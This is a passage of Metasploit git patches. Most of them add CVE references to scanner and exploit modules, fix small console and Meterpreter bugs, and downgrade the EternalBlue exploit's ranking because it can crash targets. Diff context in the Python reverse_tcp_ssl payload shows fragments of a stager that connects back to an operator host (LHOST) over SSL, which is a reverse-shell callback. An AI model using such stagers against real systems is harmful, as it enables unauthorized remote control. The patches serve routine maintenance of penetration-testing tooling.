modules/auxiliary/scanner/ntp/ntp_unsettrap_dos.rb | 1 + modules/auxiliary/scanner/oracle/tnspoison_checker.rb | 1 + modules/auxiliary/scanner/portmap/portmap_amp.rb | 1 + modules/auxiliary/scanner/scada/moxa_discover.rb | 1 + modules/auxiliary/scanner/udp/udp_amplification.rb | 1 + modules/auxiliary/scanner/udp_scanner_template.rb | 7 ++++++- modules/auxiliary/scanner/upnp/ssdp_amp.rb | 1 + modules/auxiliary/scanner/upnp/ssdp_msearch.rb | 9 ++++++++- modules/auxiliary/scanner/vnc/vnc_none_auth.rb | 1 + .../unix/webapp/actualanalyzer_ant_cookie_exec.rb | 1 + 21 files changed, 45 insertions(+), 5 deletions(-) diff --git a/modules/auxiliary/scanner/dns/dns_amp.rb b/modules/auxiliary/scanner/dns/dns_amp.rb index b66783c091..39d7144a11 100644 --- a/modules/auxiliary/scanner/dns/dns_amp.rb +++ b/modules/auxiliary/scanner/dns/dns_amp.rb @@ -19,7 +19,12 @@ class MetasploitModule < Msf::Auxiliary third party. }, 'Author' => [ 'xistence '], # Original scanner module - 'License' => MSF_LICENSE + 'License' => MSF_LICENSE, + 'References' => + [ + ['CVE', '2006-0987'], + ['CVE', '2006-0988'], + ] ) register_options( [ @@ -124,7 +129,7 @@ class MetasploitModule < Msf::Auxiliary :port => datastore['RPORT'], :proto => 'udp', :name => "DNS", :info => "DNS amplification - #{data.length} bytes [#{amp.round(2)}x Amplification]", - :refs => [ "CVE-2006-0987", "CVE-2006-0988" ]) + :refs => self.references) end # If these flags are set, we get a valid response but recursion is not available diff --git a/modules/auxiliary/scanner/http/host_header_injection.rb b/modules/auxiliary/scanner/http/host_header_injection.rb index f7e0dc5788..4f29c3e1d2 100644 --- a/modules/auxiliary/scanner/http/host_header_injection.rb +++ b/modules/auxiliary/scanner/http/host_header_injection.rb @@ -21,6 +21,7 @@ class MetasploitModule < Msf::Auxiliary 'License' => MSF_LICENSE, 'References' => [ + ['CVE', 'CVE-2016-10073'], # validate, an instance of a described attack approach from the original reference ['URL', 'http://www.skeletonscribe.net/2013/05/practical-http-host-header-attacks.html'] ] )) diff --git a/modules/auxiliary/scanner/http/jenkins_command.rb b/modules/auxiliary/scanner/http/jenkins_command.rb index 4280549ba9..3c7dde16e2 100644 --- a/modules/auxiliary/scanner/http/jenkins_command.rb +++ b/modules/auxiliary/scanner/http/jenkins_command.rb @@ -26,6 +26,8 @@ class MetasploitModule < Msf::Auxiliary ], 'References' => [ + ['CVE', '2015-8103'], # see link and validate, https://highon.coffee/blog/jenkins-api-unauthenticated-rce-exploit/ states this is another issue + ['URL', 'https://jenkins.io/security/advisory/2015-11-11/'], ['URL', 'https://www.pentestgeek.com/penetration-testing/hacking-jenkins-servers-with-no-password/'], ['URL', 'https://wiki.jenkins-ci.org/display/JENKINS/Jenkins+Script+Console'], ], diff --git a/modules/auxiliary/scanner/http/trace.rb b/modules/auxiliary/scanner/http/trace.rb index 79c2e065b2..66cb7403e2 100644 --- a/modules/auxiliary/scanner/http/trace.rb +++ b/modules/auxiliary/scanner/http/trace.rb @@ -20,7 +20,12 @@ class MetasploitModule < Msf::Auxiliary 'Jay Turla <@shipcod3>' , #Cross-Site Tracing (XST) Checker 'CG' #HTTP TRACE Detection ], - 'License' => MSF_LICENSE + 'License' => MSF_LICENSE, + 'References' => + [ + ['CVE', '2005-3398'], # early case where this vector applied to a specific application. + ['URL', 'https://www.owasp.org/index.php/Cross_Site_Tracing'] + ] ) end diff --git a/modules/auxiliary/scanner/ipmi/ipmi_cipher_zero.rb b/modules/auxiliary/scanner/ipmi/ipmi_cipher_zero.rb index 2afafdf68b..993a4c8db0 100644 --- a/modules/auxiliary/scanner/ipmi/ipmi_cipher_zero.rb +++ b/modules/auxiliary/scanner/ipmi/ipmi_cipher_zero.rb @@ -23,6 +23,7 @@ class MetasploitModule < Msf::Auxiliary 'License' => MSF_LICENSE, 'References' => [ + ['CVE', '2013-4782'], ['URL', 'http://fish2.com/ipmi/cipherzero.html'], ['OSVDB', '93038'], ['OSVDB', '93039'], diff --git a/modules/auxiliary/scanner/misc/sercomm_backdoor_scanner.rb b/modules/auxiliary/scanner/misc/sercomm_backdoor_scanner.rb index 8ab1f22b2a..e423f88aae 100644 --- a/modules/auxiliary/scanner/misc/sercomm_backdoor_scanner.rb +++ b/modules/auxiliary/scanner/misc/sercomm_backdoor_scanner.rb @@ -24,6 +24,7 @@ class MetasploitModule < Msf::Auxiliary 'License' => MSF_LICENSE, 'References' => [ + [ 'CVE', '2014-0659' ], [ 'OSVDB', '101653' ], [ 'URL', 'https://github.com/elvanderb/TCP-32764' ] ], diff --git a/modules/auxiliary/scanner/ntp/ntp_peer_list_dos.rb b/modules/auxiliary/scanner/ntp/ntp_peer_list_dos.rb index 2c12582f45..cb35d9d223 100644 --- a/modules/auxiliary/scanner/ntp/ntp_peer_list_dos.rb +++ b/modules/auxiliary/scanner/ntp/ntp_peer_list_dos.rb @@ -24,6 +24,7 @@ class MetasploitModule < Msf::Auxiliary 'Author' => 'Jon Hart ', 'References' => [ + ['CVE', '2013-5211'], # see also scanner/ntp/ntp_monlist.rb ['URL', 'https://github.com/rapid7/metasploit-framework/pull/3696'], ['URL', 'http://r-7.co/R7-2014-12'] ], diff --git a/modules/auxiliary/scanner/ntp/ntp_peer_list_sum_dos.rb b/modules/auxiliary/scanner/ntp/ntp_peer_list_sum_dos.rb index 1b112322bf..bf44690300 100644 --- a/modules/auxiliary/scanner/ntp/ntp_peer_list_sum_dos.rb +++ b/modules/auxiliary/scanner/ntp/ntp_peer_list_sum_dos.rb @@ -24,6 +24,7 @@ class MetasploitModule < Msf::Auxiliary 'Author' => 'Jon Hart ', 'References' => [ + ['CVE', '2013-5211'], # see also scanner/ntp/ntp_monlist.rb ['URL', 'https://github.com/rapid7/metasploit-framework/pull/3696'], ['URL', 'http://r-7.co/R7-2014-12'] ], diff --git a/modules/auxiliary/scanner/ntp/ntp_readvar.rb b/modules/auxiliary/scanner/ntp/ntp_readvar.rb index 79da60051c..0dab772289 100644 --- a/modules/auxiliary/scanner/ntp/ntp_readvar.rb +++ b/modules/auxiliary/scanner/ntp/ntp_readvar.rb @@ -26,6 +26,7 @@ class MetasploitModule < Msf::Auxiliary 'License' => MSF_LICENSE, 'References' => [ + ['CVE', '2013-5211'], # see also scanner/ntp/ntp_monlist.rb [ 'URL', 'http://www.rapid7.com/vulndb/lookup/ntp-clock-variables-disclosure' ] ] ) diff --git a/modules/auxiliary/scanner/ntp/ntp_req_nonce_dos.rb b/modules/auxiliary/scanner/ntp/ntp_req_nonce_dos.rb index 6b3ac8eb6d..a4a0642a13 100644 --- a/modules/auxiliary/scanner/ntp/ntp_req_nonce_dos.rb +++ b/modules/auxiliary/scanner/ntp/ntp_req_nonce_dos.rb @@ -25,6 +25,7 @@ class MetasploitModule < Msf::Auxiliary 'Author' => 'Jon Hart ', 'References' => [ + ['CVE', '2013-5211'], # see also scanner/ntp/ntp_monlist.rb ['URL', 'https://github.com/rapid7/metasploit-framework/pull/3696'], ['URL', 'http://r-7.co/R7-2014-12'] ], diff --git a/modules/auxiliary/scanner/ntp/ntp_reslist_dos.rb b/modules/auxiliary/scanner/ntp/ntp_reslist_dos.rb index ac5c08ae60..5f6e42cfb5 100644 --- a/modules/auxiliary/scanner/ntp/ntp_reslist_dos.rb +++ b/modules/auxiliary/scanner/ntp/ntp_reslist_dos.rb @@ -26,6 +26,7 @@ class MetasploitModule < Msf::Auxiliary 'Author' => 'Jon Hart ', 'References' => [ + ['CVE', '2013-5211'], # see also scanner/ntp/ntp_monlist.rb ['URL', 'https://github.com/rapid7/metasploit-framework/pull/3696'], ['URL', 'http://r-7.co/R7-2014-12'] ], diff --git a/modules/auxiliary/scanner/ntp/ntp_unsettrap_dos.rb b/modules/auxiliary/scanner/ntp/ntp_unsettrap_dos.rb index 3176bd8e2b..57b7c78a59 100644 --- a/modules/auxiliary/scanner/ntp/ntp_unsettrap_dos.rb +++ b/modules/auxiliary/scanner/ntp/ntp_unsettrap_dos.rb @@ -24,6 +24,7 @@ class MetasploitModule < Msf::Auxiliary 'Author' => 'Jon Hart ', 'References' => [ + ['CVE', '2013-5211'], # see also scanner/ntp/ntp_monlist.rb ['URL', 'https://github.com/rapid7/metasploit-framework/pull/3696'], ['URL', 'http://r-7.co/R7-2014-12'] ], diff --git a/modules/auxiliary/scanner/oracle/tnspoison_checker.rb b/modules/auxiliary/scanner/oracle/tnspoison_checker.rb index 956a9893ec..a1518d54fb 100644 --- a/modules/auxiliary/scanner/oracle/tnspoison_checker.rb +++ b/modules/auxiliary/scanner/oracle/tnspoison_checker.rb @@ -21,6 +21,7 @@ class MetasploitModule < Msf::Auxiliary 'Author' => ['ir0njaw (Nikita Kelesis) '], # of Digital Security [http://dsec.ru] 'References' => [ + [ 'CVE', '2012-1675'], [ 'URL', 'http://seclists.org/fulldisclosure/2012/Apr/204' ], ], 'DisclosureDate' => 'Apr 18 2012', diff --git a/modules/auxiliary/scanner/portmap/portmap_amp.rb b/modules/auxiliary/scanner/portmap/portmap_amp.rb index 53ecf1472c..7fac7f9d89 100644 --- a/modules/auxiliary/scanner/portmap/portmap_amp.rb +++ b/modules/auxiliary/scanner/portmap/portmap_amp.rb @@ -20,6 +20,7 @@ class MetasploitModule < Msf::Auxiliary 'License' => MSF_LICENSE, 'References' => [ + ['CVE', '2013-5211'], # see also scanner/ntp/ntp_monlist.rb ['URL', 'https://www.us-cert.gov/ncas/alerts/TA14-017A'], ['URL', 'http://blog.level3.com/security/a-new-ddos-reflection-attack-portmapper-an-early-warning-to-the-industry/'] ], diff --git a/modules/auxiliary/scanner/scada/moxa_discover.rb b/modules/auxiliary/scanner/scada/moxa_discover.rb index 98d999bd2c..e4ed17dfd1 100644 --- a/modules/auxiliary/scanner/scada/moxa_discover.rb +++ b/modules/auxiliary/scanner/scada/moxa_discover.rb @@ -35,6 +35,7 @@ class MetasploitModule < Msf::Auxiliary 'License' => MSF_LICENSE, 'References' => [ + [ 'CVE', '2016-9361'], [ 'URL', 'https://www.digitalbond.com/blog/2016/10/25/serial-killers/'], [ 'URL', 'http://www.moxa.com/support/faq/faq_detail.aspx?id=646' ], ] diff --git a/modules/auxiliary/scanner/udp/udp_amplification.rb b/modules/auxiliary/scanner/udp/udp_amplification.rb index 8daa328212..468c109dfb 100644 --- a/modules/auxiliary/scanner/udp/udp_amplification.rb +++ b/modules/auxiliary/scanner/udp/udp_amplification.rb @@ -16,6 +16,7 @@ class MetasploitModule < Msf::Auxiliary 'License' => MSF_LICENSE, 'References' => [ + ['CVE', '2013-5211'], # see also scanner/ntp/ntp_monlist.rb ['URL', 'https://www.us-cert.gov/ncas/alerts/TA14-017A'] ] ) diff --git a/modules/auxiliary/scanner/udp_scanner_template.rb b/modules/auxiliary/scanner/udp_scanner_template.rb index d05c8fd5b9..f1f8267f15 100644 --- a/modules/auxiliary/scanner/udp_scanner_template.rb +++ b/modules/auxiliary/scanner/udp_scanner_template.rb @@ -21,7 +21,12 @@ class MetasploitModule < Msf::Auxiliary ), 'Author' => 'Joe Contributor ', 'DisclosureDate' => 'Mar 15 2014', - 'License' => MSF_LICENSE + 'License' => MSF_LICENSE, + 'References' => + [ + ['CVE', '0000-0000'], # remove or update if CVE exists + ['URL', 'https://SomeURLinCyberspace.local'] + ] ) ) diff --git a/modules/auxiliary/scanner/upnp/ssdp_amp.rb b/modules/auxiliary/scanner/upnp/ssdp_amp.rb index df1ca06fc8..f67a49a794 100644 --- a/modules/auxiliary/scanner/upnp/ssdp_amp.rb +++ b/modules/auxiliary/scanner/upnp/ssdp_amp.rb @@ -17,6 +17,7 @@ class MetasploitModule < Msf::Auxiliary 'License' => MSF_LICENSE, 'References' => [ + ['CVE', '2013-5211'], # see also scanner/ntp/ntp_monlist.rb ['URL', 'https://www.us-cert.gov/ncas/alerts/TA14-017A'] ], ) diff --git a/modules/auxiliary/scanner/upnp/ssdp_msearch.rb b/modules/auxiliary/scanner/upnp/ssdp_msearch.rb index a3e0f273c7..cbb209251e 100644 --- a/modules/auxiliary/scanner/upnp/ssdp_msearch.rb +++ b/modules/auxiliary/scanner/upnp/ssdp_msearch.rb @@ -13,7 +13,14 @@ class MetasploitModule < Msf::Auxiliary 'Name' => 'UPnP SSDP M-SEARCH Information Discovery', 'Description' => 'Discover information from UPnP-enabled systems', 'Author' => [ 'todb', 'hdm'], # Original scanner module and vuln info reporter, respectively - 'License' => MSF_LICENSE + 'License' => MSF_LICENSE, + 'References' => + [ + ['CVE', '2012-5958'], + ['CVE', '2012-5959'], + ['CVE', '2013-0230'], + ['CVE', '2013-0229'] + ] ) register_options( [ diff --git a/modules/auxiliary/scanner/vnc/vnc_none_auth.rb b/modules/auxiliary/scanner/vnc/vnc_none_auth.rb index bbce7b8e45..d91d18e1d3 100644 --- a/modules/auxiliary/scanner/vnc/vnc_none_auth.rb +++ b/modules/auxiliary/scanner/vnc/vnc_none_auth.rb @@ -17,6 +17,7 @@ class MetasploitModule < Msf::Auxiliary 'Description' => 'Detect VNC servers that support the "None" authentication method.', 'References' => [ + ['CVE', '2006-2369'], # a related instance where "None" could be offered and used when not configured as allowed. ['URL', 'http://en.wikipedia.org/wiki/RFB'], ['URL', 'http://en.wikipedia.org/wiki/Vnc'], ], diff --git a/modules/exploits/unix/webapp/actualanalyzer_ant_cookie_exec.rb b/modules/exploits/unix/webapp/actualanalyzer_ant_cookie_exec.rb index c07127bfb3..f921e16d75 100644 --- a/modules/exploits/unix/webapp/actualanalyzer_ant_cookie_exec.rb +++ b/modules/exploits/unix/webapp/actualanalyzer_ant_cookie_exec.rb @@ -27,6 +27,7 @@ class MetasploitModule < Msf::Exploit::Remote ], 'References' => [ + ['CVE', '2014-5470'], ['EDB', '34450'], ['OSVDB', '110601'] ], From b932aae82ee623fa25e1c9d1f53b7a0eea156471 Mon Sep 17 00:00:00 2001 From: Jeffrey Martin Date: Tue, 6 Jun 2017 11:50:07 -0500 Subject: [PATCH 32/38] reference typo fix --- modules/auxiliary/scanner/http/host_header_injection.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/http/host_header_injection.rb b/modules/auxiliary/scanner/http/host_header_injection.rb index 4f29c3e1d2..c17a0148cf 100644 --- a/modules/auxiliary/scanner/http/host_header_injection.rb +++ b/modules/auxiliary/scanner/http/host_header_injection.rb @@ -21,7 +21,7 @@ class MetasploitModule < Msf::Auxiliary 'License' => MSF_LICENSE, 'References' => [ - ['CVE', 'CVE-2016-10073'], # validate, an instance of a described attack approach from the original reference + ['CVE', '2016-10073'], # validate, an instance of a described attack approach from the original reference ['URL', 'http://www.skeletonscribe.net/2013/05/practical-http-host-header-attacks.html'] ] )) From a953d94f6166a6449b7d3a6b3dec1b65161340ac Mon Sep 17 00:00:00 2001 From: Spencer McIntyre Date: Tue, 6 Jun 2017 19:07:55 -0400 Subject: [PATCH 33/38] Minor white space cleanups for PR #8340 --- lib/msf/core/payload/python/reverse_tcp_ssl.rb | 8 +++----- 1 file changed, 3 insertions(+), 5 deletions(-) diff --git a/lib/msf/core/payload/python/reverse_tcp_ssl.rb b/lib/msf/core/payload/python/reverse_tcp_ssl.rb index 6873728a86..02190d0df2 100644 --- a/lib/msf/core/payload/python/reverse_tcp_ssl.rb +++ b/lib/msf/core/payload/python/reverse_tcp_ssl.rb @@ -19,11 +19,9 @@ module Payload::Python::ReverseTcpSsl super register_advanced_options([ OptInt.new('StagerRetryCount', [false, 'The number of times the stager should retry if the first connect fails (zero to infinite retries)', 10]), - OptInt.new('StagerRetryWait', [false, 'Number of seconds to wait for the stager between reconnect attempts',5]) + OptInt.new('StagerRetryWait', [false, 'Number of seconds to wait for the stager between reconnect attempts', 5]) ], self.class) end - - # # Generate the first stage @@ -59,8 +57,8 @@ module Payload::Python::ReverseTcpSsl cmd << "so.connect(('#{opts[:host]}',#{opts[:port]}))\n" cmd << "s=ssl.wrap_socket(so)\n" else - if opts[:retry_count]>0 - cmd << "for x in range(#{opts[:retry_count].to_i}):\n" + if opts[:retry_count] > 0 + cmd << "for x in range(#{opts[:retry_count].to_i}):\n" else cmd << "while 1:\n" end From 6131e4bd82fe852ff4889400d90ca5120ff2a151 Mon Sep 17 00:00:00 2001 From: OJ Date: Wed, 7 Jun 2017 09:37:24 +1000 Subject: [PATCH 34/38] Fix download lambda function to take correct param count This is an emergency fix as a result of something being broken in master. This is also being pushed straight to master because github is down and the PR process isn't possible. This commit was reviewed by @wvu-r7 prior to being pushed. --- lib/rex/post/meterpreter/extensions/stdapi/fs/file.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/rex/post/meterpreter/extensions/stdapi/fs/file.rb b/lib/rex/post/meterpreter/extensions/stdapi/fs/file.rb index afe82e1bac..5ec16f86fc 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/fs/file.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/fs/file.rb @@ -328,7 +328,7 @@ class File < Rex::Post::Meterpreter::Extensions::Stdapi::Fs::IO continue=false tries=false tries_no=0 - stat ||= lambda { } + stat ||= lambda { |a,b,c| } if opts continue = true if opts["continue"] From a052ee40649ce93ae22d0a05bda48b416df07ecf Mon Sep 17 00:00:00 2001 From: Spencer McIntyre Date: Tue, 6 Jun 2017 20:02:06 -0400 Subject: [PATCH 35/38] Use the opts hash not the datastore --- lib/msf/core/payload/python/reverse_tcp.rb | 2 +- lib/msf/core/payload/python/reverse_tcp_ssl.rb | 4 ++-- 2 files changed, 3 insertions(+), 3 deletions(-) diff --git a/lib/msf/core/payload/python/reverse_tcp.rb b/lib/msf/core/payload/python/reverse_tcp.rb index 4f67295246..c40f46ad28 100644 --- a/lib/msf/core/payload/python/reverse_tcp.rb +++ b/lib/msf/core/payload/python/reverse_tcp.rb @@ -32,7 +32,7 @@ module Payload::Python::ReverseTcp port: datastore['LPORT'], host: datastore['LHOST'], retry_count: datastore['StagerRetryCount'], - retry_wait: datastore['StagerRetryWait'], + retry_wait: datastore['StagerRetryWait'] } generate_reverse_tcp(conf) diff --git a/lib/msf/core/payload/python/reverse_tcp_ssl.rb b/lib/msf/core/payload/python/reverse_tcp_ssl.rb index 02190d0df2..fa557b420f 100644 --- a/lib/msf/core/payload/python/reverse_tcp_ssl.rb +++ b/lib/msf/core/payload/python/reverse_tcp_ssl.rb @@ -31,7 +31,7 @@ module Payload::Python::ReverseTcpSsl port: datastore['LPORT'], host: datastore['LHOST'], retry_count: datastore['StagerRetryCount'], - retry_wait: datastore['StagerRetryWait'], + retry_wait: datastore['StagerRetryWait'] } generate_reverse_tcp_ssl(conf) @@ -51,7 +51,7 @@ module Payload::Python::ReverseTcpSsl def generate_reverse_tcp_ssl(opts={}) # Set up the socket - cmd = "import ssl,socket,struct#{datastore['StagerRetryWait'].to_i > 0 ? ',time' : ''}\n" + cmd = "import ssl,socket,struct#{opts[:retry_wait].to_i > 0 ? ',time' : ''}\n" if opts[:retry_wait].blank? # do not retry at all (old style) cmd << "so=socket.socket(2,1)\n" # socket.AF_INET = 2 cmd << "so.connect(('#{opts[:host]}',#{opts[:port]}))\n" From 596924552e00caaf48d64a54bb7f4691cb43c3dd Mon Sep 17 00:00:00 2001 From: William Vu Date: Wed, 7 Jun 2017 03:19:30 -0500 Subject: [PATCH 36/38] Fix literal \n in jobs -i Regression from #4063. --- lib/msf/ui/console/command_dispatcher/jobs.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/ui/console/command_dispatcher/jobs.rb b/lib/msf/ui/console/command_dispatcher/jobs.rb index 6ddb848068..cfb2d54bea 100644 --- a/lib/msf/ui/console/command_dispatcher/jobs.rb +++ b/lib/msf/ui/console/command_dispatcher/jobs.rb @@ -165,7 +165,7 @@ module Msf job = framework.jobs[job_id.to_s] mod = job.ctx[0] - output = '\n' + output = "\n" output += "Name: #{mod.name}" output += ", started at #{job.start_time}" if job.start_time print_line(output) From 4198efa41f1004cb206557a37d239a1ac6a1e23e Mon Sep 17 00:00:00 2001 From: William Vu Date: Thu, 8 Jun 2017 00:17:42 -0500 Subject: [PATCH 37/38] Remove pry from CommandDispatcher::Creds... My bad. Should have been caught in #8517. --- lib/msf/ui/console/command_dispatcher/creds.rb | 3 --- 1 file changed, 3 deletions(-) diff --git a/lib/msf/ui/console/command_dispatcher/creds.rb b/lib/msf/ui/console/command_dispatcher/creds.rb index b715afd55b..e0b94dd230 100644 --- a/lib/msf/ui/console/command_dispatcher/creds.rb +++ b/lib/msf/ui/console/command_dispatcher/creds.rb @@ -84,9 +84,6 @@ class Creds # TODO: this needs to be cleaned up to use the new syntax # def cmd_creds_help - require 'pry' - binding.pry - print_line print_line "With no sub-command, list credentials. If an address range is" print_line "given, show only credentials with logins on hosts within that" From a968a74ae0f98795112178b032c4cb326c60f889 Mon Sep 17 00:00:00 2001 From: "Stephen Shkardoon (ss23)" Date: Fri, 9 Jun 2017 10:56:12 +1200 Subject: [PATCH 38/38] Update ms17_010_eternalblue description and ranking. The module has been noted to cause crashes, reboots, BSOD, etc, on some systems. --- modules/exploits/windows/smb/ms17_010_eternalblue.rb | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/modules/exploits/windows/smb/ms17_010_eternalblue.rb b/modules/exploits/windows/smb/ms17_010_eternalblue.rb index 310e6de498..a2960de1fe 100644 --- a/modules/exploits/windows/smb/ms17_010_eternalblue.rb +++ b/modules/exploits/windows/smb/ms17_010_eternalblue.rb @@ -8,7 +8,7 @@ require 'ruby_smb/smb1/packet' require 'windows_error' class MetasploitModule < Msf::Exploit::Remote - Rank = GoodRanking + Rank = AverageRanking include Msf::Exploit::Remote::Tcp @@ -32,6 +32,9 @@ class MetasploitModule < Msf::Exploit::Remote The module will attempt to use Anonymous login, by default, to authenticate to perform the exploit. If the user supplies credentials in the SMBUser,SMBPass, and SMBDomain options it will use those instead. + + On some systems, this module may cause system instability and crashes, such as a BSOD or + a reboot. This may be more likely with some payloads. }, 'Author' => [